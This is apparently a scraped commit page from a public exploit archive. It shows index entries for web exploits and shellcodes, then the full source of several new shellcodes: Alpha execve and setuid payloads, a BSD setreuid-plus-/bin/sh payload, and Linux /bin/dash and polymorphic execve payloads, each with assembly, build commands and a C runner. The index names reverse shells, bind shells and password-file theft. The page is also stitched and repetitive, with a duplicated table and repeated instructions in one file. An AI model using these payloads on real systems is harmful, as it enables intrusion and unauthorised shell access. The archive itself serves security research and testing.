43460,exploits/hardware/webapps/43460.py,"FiberHome LM53Q1 - Multiple Vulnerabilities",2018-01-08,"Ibad Shah",webapps,hardware,
43461,exploits/php/webapps/43461.txt,"WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload",2018-01-08,NinTechNet,webapps,php,
43462,exploits/php/webapps/43462.html,"Vanilla < 2.1.5 - Cross-Site Request Forgery",2018-01-08,"Anand Meyyappan",webapps,php,
43475,exploits/php/webapps/43475.txt,"Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure",2018-01-10,telahdihapus,webapps,php,
43477,exploits/php/webapps/43477.txt,"Muviko 1.1 - SQL Injection",2018-01-10,"Ahmad Mahfouz",webapps,php,
43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,
43484,exploits/php/webapps/43484.txt,"WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43485,exploits/php/webapps/43485.txt,"WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43487,exploits/php/webapps/43487.txt,"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43488,exploits/php/webapps/43488.txt,"Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting",2018-01-10,"Mattia Furlani",webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.

14
files_shellcodes.csv
View file

@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
@ -13,8 +13,8 @@ id,file,description,date,author,type,platform
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/freebsd_x86/13256.c,"FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,freebsd_x86
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
@ -416,7 +416,7 @@ id,file,description,date,author,type,platform
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
@ -622,6 +622,12 @@ id,file,description,date,author,type,platform
41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86
43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86
43476,shellcodes/lin_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,lin_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86

1 id file description date author type platform
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve /bin/sh Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
6 13244 shellcodes/bsd_x86/13244.c BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
7 13245 shellcodes/bsd_x86/13245.c BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
8 13246 shellcodes/bsd_x86/13246.c BSD/x86 - execve /bin/sh Shellcode (27 bytes) 2004-09-26 n0gada shellcode bsd_x86
9 13247 shellcodes/bsd_x86/13247.c BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
10 13248 shellcodes/bsd_x86/13248.c BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes) 2004-09-26 no1 shellcode bsd_x86
13 13251 shellcodes/bsd_x86/13251.c BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) 2004-09-26 dev0id shellcode bsd_x86
14 13252 shellcodes/bsd_x86/13252.c BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
15 13254 shellcodes/bsd_x86/13254.c BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes) 2004-09-26 dev0id shellcode bsd_x86
16 13255 shellcodes/bsd_x86/13255.c BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes) BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
17 13256 shellcodes/bsd_x86/13256.c shellcodes/freebsd_x86/13256.c BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd_x86 freebsd_x86
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve /bin/sh Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve /bin/sh Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
416 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
417 15879 shellcodes/win_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode 2010-12-31 Skylined shellcode win_x86
418 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
419 16026 shellcodes/bsd_x86/16026.c shellcodes/freebsd_x86/16026.c BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) 2011-01-21 Tosh shellcode bsd_x86 freebsd_x86
420 16283 shellcodes/win_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode win_x86
421 17432 shellcodes/sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode sh4
422 17194 shellcodes/lin_x86/17194.txt Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode lin_x86
622 41510 shellcodes/lin_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode lin_x86-64
623 41581 shellcodes/win_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode win_x86
624 43433 shellcodes/lin_x86/43433.c Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode lin_x86
625 43476 shellcodes/lin_x86/43476.c Linux/x86 - execve /bin/dash Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode lin_x86
626 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
627 43481 shellcodes/alpha/43481.c Alpha - execve() Shellcode (112 bytes) 2009-01-01 anonymous shellcode alpha
628 43482 shellcodes/alpha/43482.c Alpha - setuid() Shellcode (156 bytes) 2009-01-01 anonymous shellcode alpha
629 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
630 43489 shellcodes/lin_x86/43489.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode lin_x86
631 41630 shellcodes/lin_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) 2017-03-17 WangYihang shellcode lin_x86
632 41631 shellcodes/lin_x86/41631.c Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode lin_x86
633 41635 shellcodes/lin_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) 2017-03-19 WangYihang shellcode lin_x86

29
shellcodes/alpha/43480.c Normal file
View file

@ -0,0 +1,29 @@
/*
Lamont Granquist
lamontg@hitl.washington.edu
lamontg@u.washington.edu
*/
int rawcode[] = {
0x2230fec4, /* subq $16,0x13c,$17 [2000]*/
0x47ff0412, /* clr $18 [2000]*/
0x42509532, /* subq $18, 0x84 [2000]*/
0x239fffff, /* xor $18, 0xffffffff, $18 */
0x4b84169c,
0x465c0812,
0xb2510134, /* stl $18, 0x134($17)[2000]*/
0x265cff98, /* lda $18, 0xff978cd0[2000]*/
0x22528cd1,
0x465c0812, /* xor $18, 0xffffffff, $18 */
0xb2510140, /* stl $18, 0x140($17)[2000]*/
0xb6110148, /* stq $16,0x148($17) [2000]*/
0xb7f10150, /* stq $31,0x150($17) [2000]*/
0x22310148, /* addq $17,0x148,$17 [2000]*/
0x225f013a, /* ldil $18,0x13a [2000]*/
0x425ff520, /* subq $18,0xff,$0 [2000]*/
0x47ff0412, /* clr $18 [2000]*/
0xffffffff, /* call_pal 0x83 [2000]*/
0xd21fffed, /* bsr $16,$l1 ENTRY */
0x6e69622f, /* .ascii "/bin" [2000]*/
/* .ascii "/sh\0" is generated */
};

55
shellcodes/alpha/43481.c Normal file
View file

@ -0,0 +1,55 @@
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
/* $16 = $30 - 200
/* $16 must have the shellcode address. However, before */
/* the bsr instruction, $16 can't have the address. */
/* This instruction just store the meaningless address. */
/* The all instruction before bsr are meaningless. */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
/* $17 = 0 or 0x83 */
/* $17 = 0x83 */
"\x12\x94\x07\x42" /* addq $16,60,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
/* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4 */
/* address. */
/* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" ) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
/* $17 = "\x1f\x04\xff\x47" */
/* "\x1f\x04\xff\x47" is nop instruction. */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
/* change "bsr $16,-28" instruction" into nop */
/* instruction to pass through the bsr instruction. */
/* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" ) */
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
/* Jump to "bis $31,0x83,$17" and store the current */
/* address in the $16. */
/* After jump, this insturction will be changed into */
/* nop instruction. */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* This will be changed to "\x83\x00\x00\x00" */

40
shellcodes/alpha/43482.c Normal file
View file

@ -0,0 +1,40 @@
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */

25
shellcodes/bsd_x86/43483.c Normal file
View file

@ -0,0 +1,25 @@
/*
* bsd/x86 setreuid/exec shellcode
*
* setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0)
* shellcode based on hkpco's setreuid/exec shellcode for linux
* Tested on FreeBSD
*/
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\xb0\x19\x50\xcd\x80\x50"
"\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
"\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
"\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
"\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)
int main()
{
int (*f)() = (int (*)())shellcode;
printf("%d\n",strlen(shellcode));
f();
return 0;
}

0
shellcodes/bsd_x86/13256.c → shellcodes/freebsd_x86/13256.c
View file

0
shellcodes/bsd_x86/16026.c → shellcodes/freebsd_x86/16026.c
View file

76
shellcodes/lin_x86/43476.c Normal file
View file

@ -0,0 +1,76 @@
/*
################## Description ####################
; Title : exec /bin/dash - Shellcode
; Author : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : spawn /bin/dash shell
; OS : Linux
; Arch : x86
; Size : 30 bytes
################### dash.nasm #####################
global _start
section .text
_start:
; push NULL into the stack
xor eax, eax
push eax
; push (////bin/dash) into the stack
push 0x68736164
push 0x2f6e6962
push 0x2f2f2f2f
; push ESP pointer to EBX
mov ebx, esp
; execute __NR_execve syscall
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
################### dash binary #####################
nasm -f elf32 -o dash.o dash.nasm
ld -z execstack -o dash dash.o
################### Shellcode ########################
objdump -d dash -M intel
################## Compile #########################
gcc -fno-stack-protector -z execstack dash.c -o dash
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

66
shellcodes/lin_x86/43489.c Normal file
View file

@ -0,0 +1,66 @@
/*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-1122
# Tested on: i686 GNU/Linux
# '//bin/sh' = 0x68732f6e 0x69622f2f
########## polymorphic.nasm ##########
global _start
section .text
_start:
add esi, 0x30 ;junk
xor ecx, ecx
mul ecx
mov dword [esp-4], ecx
sub esp, 4
mov esi, 0x353ffc3b
add esi, 0x33333333 ; 0x68732f6e
mov dword [esp-4], esi
mov edi, 0xada67373
sub edi, 0x44444444 ; 0x69622f2f
mov dword [esp-8], edi
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
####################################
$ nasm -f elf polymorphic.nasm
$ ld -o polymorphic polymorphic.o
$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
$ ./x86PolymorphicShellcodelinux32
Shellcode Length: 53
$ uname -a
Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
$
####################################
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
"\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
"\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}